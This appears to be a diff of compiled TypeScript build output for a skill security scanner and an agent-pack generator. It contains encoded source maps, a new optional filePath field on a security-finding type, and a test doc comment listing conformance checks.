{"version":3,"file":"patterns.js","sourceRoot":"","sources":["../../../../src/security/scanner/patterns.ts"],"names":[],"mappings":"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"}
|
|
@@ -33,6 +33,8 @@ export interface SecurityFinding {
|
|
|
33
33
|
inDocumentationContext?: boolean;
|
|
34
34
|
/** Confidence level - lower for findings in documentation context */
|
|
35
35
|
confidence?: FindingConfidence;
|
|
36
|
+
/** SMI-5436: Path of the skill bundle file that triggered this finding, relative to the skill root. Absent for SKILL.md-only findings. */
|
|
37
|
+
filePath?: string;
|
|
36
38
|
}
|
|
37
39
|
/**
|
|
38
40
|
* Risk score breakdown by category
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../../../../src/security/scanner/types.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAEH;;GAEG;AACH,MAAM,MAAM,mBAAmB,GAC3B,KAAK,GACL,gBAAgB,GAChB,WAAW,GACX,oBAAoB,GACpB,oBAAoB,GACpB,gBAAgB,GAChB,mBAAmB,GACnB,sBAAsB,GACtB,YAAY,GACZ,MAAM,GACN,KAAK,GACL,gBAAgB,GAChB,sBAAsB,CAAA;AAE1B;;GAEG;AACH,MAAM,MAAM,gBAAgB,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAA;AAErE;;;;;GAKG;AACH,MAAM,MAAM,iBAAiB,GAAG,MAAM,GAAG,QAAQ,GAAG,KAAK,CAAA;AAEzD;;GAEG;AACH,MAAM,WAAW,eAAe;IAC9B,IAAI,EAAE,mBAAmB,CAAA;IACzB,QAAQ,EAAE,gBAAgB,CAAA;IAC1B,OAAO,EAAE,MAAM,CAAA;IACf,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,UAAU,CAAC,EAAE,MAAM,CAAA;IACnB,6CAA6C;IAC7C,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,iFAAiF;IACjF,sBAAsB,CAAC,EAAE,OAAO,CAAA;IAChC,qEAAqE;IACrE,UAAU,CAAC,EAAE,iBAAiB,CAAA;
|
|
1
|
+
{"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../../../../src/security/scanner/types.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAEH;;GAEG;AACH,MAAM,MAAM,mBAAmB,GAC3B,KAAK,GACL,gBAAgB,GAChB,WAAW,GACX,oBAAoB,GACpB,oBAAoB,GACpB,gBAAgB,GAChB,mBAAmB,GACnB,sBAAsB,GACtB,YAAY,GACZ,MAAM,GACN,KAAK,GACL,gBAAgB,GAChB,sBAAsB,CAAA;AAE1B;;GAEG;AACH,MAAM,MAAM,gBAAgB,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAA;AAErE;;;;;GAKG;AACH,MAAM,MAAM,iBAAiB,GAAG,MAAM,GAAG,QAAQ,GAAG,KAAK,CAAA;AAEzD;;GAEG;AACH,MAAM,WAAW,eAAe;IAC9B,IAAI,EAAE,mBAAmB,CAAA;IACzB,QAAQ,EAAE,gBAAgB,CAAA;IAC1B,OAAO,EAAE,MAAM,CAAA;IACf,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,UAAU,CAAC,EAAE,MAAM,CAAA;IACnB,6CAA6C;IAC7C,QAAQ,CAAC,EAAE,MAAM,CAAA;IACjB,iFAAiF;IACjF,sBAAsB,CAAC,EAAE,OAAO,CAAA;IAChC,qEAAqE;IACrE,UAAU,CAAC,EAAE,iBAAiB,CAAA;IAC9B,0IAA0I;IAC1I,QAAQ,CAAC,EAAE,MAAM,CAAA;CAClB;AAED;;GAEG;AACH,MAAM,WAAW,kBAAkB;IACjC,SAAS,EAAE,MAAM,CAAA;IACjB,iBAAiB,EAAE,MAAM,CAAA;IACzB,aAAa,EAAE,MAAM,CAAA;IACrB,gBAAgB,EAAE,MAAM,CAAA;IACxB,mBAAmB,EAAE,MAAM,CAAA;IAC3B,cAAc,EAAE,MAAM,CAAA;IACtB,cAAc,EAAE,MAAM,CAAA;IACtB,YAAY,EAAE,MAAM,CAAA;IACpB,SAAS,EAAE,MAAM,CAAA;IACjB,IAAI,EAAE,MAAM,CAAA;IACZ,GAAG,EAAE,MAAM,CAAA;IACX,aAAa,EAAE,MAAM,CAAA;IACrB,mBAAmB,EAAE,MAAM,CAAA;CAC5B;AAED;;GAEG;AACH,MAAM,WAAW,UAAU;IACzB,OAAO,EAAE,MAAM,CAAA;IACf,MAAM,EAAE,OAAO,CAAA;IACf,QAAQ,EAAE,eAAe,EAAE,CAAA;IAC3B,SAAS,EAAE,IAAI,CAAA;IACf,cAAc,EAAE,MAAM,CAAA;IACtB,0EAA0E;IAC1E,SAAS,EAAE,MAAM,CAAA;IACjB,0CAA0C;IAC1C,aAAa,EAAE,kBAAkB,CAAA;CAClC;AAED;;GAEG;AACH,MAAM,WAAW,cAAc;IAC7B,cAAc,CAAC,EAAE,MAAM,EAAE,CAAA;IACzB,eAAe,CAAC,EAAE,MAAM,EAAE,CAAA;IAC1B,gBAAgB,CAAC,EAAE,MAAM,CAAA;IACzB,4DAA4D;IAC5D,aAAa,CAAC,EAAE,MAAM,CAAA;CACvB"}
|
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* SMI-5456 Wave 1 Step 4 — multi-target agent-pack generator tests.
|
|
3
|
+
*
|
|
4
|
+
* Level-0 conformance (per the implementation plan's Validation Ladder):
|
|
5
|
+
* - per-target emission correctness (frontmatter fields, TOML parse, hook
|
|
6
|
+
* writes marker per contract);
|
|
7
|
+
* - determinism (two runs byte-identical);
|
|
8
|
+
* - prompt-source assembly (each job/trust/paywall section present exactly once);
|
|
9
|
+
* - prompt-pack lint (ASCII only, no model-specific idioms, no agent-addressed
|
|
10
|
+
* injection patterns);
|
|
11
|
+
* - the tool-reference invariant (jobs reference only profile tools).
|
|
12
|
+
*
|
|
13
|
+
* The authoritative "tool references subset of the real 16-name profile" check
|
|
14
|
+
* lives in the mcp-server test, which can import `AGENT_TOOL_PROFILE_NAMES` (the
|
|
15
|
+
* single source of truth) without a core -> mcp-server dependency.
|
|
16
|
+
*/
|
|
17
|
+
export {};
|
|
18
|
+
//# sourceMappingURL=agent-pack.test.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"agent-pack.test.d.ts","sourceRoot":"","sources":["../../../../src/services/agent-pack/agent-pack.test.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;GAeG"}
|